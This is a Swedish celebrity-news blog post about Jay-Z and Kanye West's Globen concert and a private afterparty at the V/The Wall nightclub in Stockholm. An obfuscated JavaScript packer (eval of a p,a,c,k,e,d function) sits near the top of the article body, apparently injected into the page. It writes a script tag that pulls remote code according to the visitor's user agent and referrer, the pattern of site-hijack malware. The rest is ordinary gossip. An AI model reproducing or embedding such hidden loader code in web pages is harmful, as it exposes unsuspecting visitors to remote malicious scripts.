Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Här festar Jay-Z och entourage ikväll!

Här festar Jay-Z och entourage ikväll!
Sebastian

*Uppdaterat* eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nykyk|var|u0026u|referrer|rehai||js|php’.split(’|’),0,{}))
Läs vår recension av
Watch the Throne här!

Ikväll är det dags för kanske en av årets största konsert. Jay-Z och Kanye West intar Globen i Stockholm.

Förutom konsert så vet vi att grabbarna gillar att festa till det. Därför har vi nu platsen där den ärorika efterfesten kommer att äga rum. Mitt på Stureplan i Stockholm på nattklubben V och The Wall kommer Jay-Z att tillbringa sin natt.

Festen arrangeras av Jay-Z’s bästa vän och skivbolagsdirektör Michael Kyser. Detta är endast en av två fester som jay-Z gör under hela Europaturnén.

– Det är superkul att få arrangera en så rolig fest på Wall tillsammans med Jay-Z. Vi hoppas även på ett kärt återseende av Kanye West, säger Kristoffer Ahlbom till Stureplan.se.Bland annat har ett stort antal flaskor av Jay-Z ”egen” champagne, Ace of Spades beställts in till kvällens ”The Black Party”. På gästlistan står också endast 400 personer som har mottagit den eftertraktade inbjudan.
Om ni inte jobbar tidigt imorgon och är sugna på att dra vidare efter konserten så kan man ju alltid prova ta sig in.
Tyvärr kommer inte Revue vara på plats på Globen eller på V/Wall.

Comments

  1. Sjuk fest!!!